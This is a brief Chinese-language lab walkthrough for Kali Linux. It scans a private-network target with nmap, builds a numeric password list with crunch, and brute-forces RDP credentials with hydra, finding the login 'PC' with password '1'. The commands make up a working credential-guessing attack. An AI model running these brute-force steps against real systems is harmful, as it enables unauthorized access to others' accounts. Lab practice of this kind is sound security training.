一、实验环境
Linux kali
目标主机 IP192.168.31.22
先用nmap扫描目标主机开放的端口
nmap 192.168.31.22
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-23 19:14 CST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.07 seconds
如果出现检测不到目标主机的情况,就用下面的指令
nmap -PN -sT 192.168.31.22
kali的字典存放目录
/usr/share/wordlists/dirbuster
这个目录有部分可供使用的字典,但我们可以更有针对性的制作字典。
crunch 1 4 1234567890 -o password1.txt
生成长度为1-4的数字密码,将结果输出到password1.txt中
hydra [目标主机IP] rdp -L [用户名字典] -P[密码字典] -V -F
-V 显示爆破过程
-F 遇到正确的用户名及密码停止爆破
hydra 192.168.31.22 rdp -L /usr/share/wordlists/dirbuster/password2.txt -P /usr/share/wordlists/dirbuster/password1.txt -V -F
用户名:PC 密码:1
做实验才弄怎么简单的密码,现实生活中要爆破很久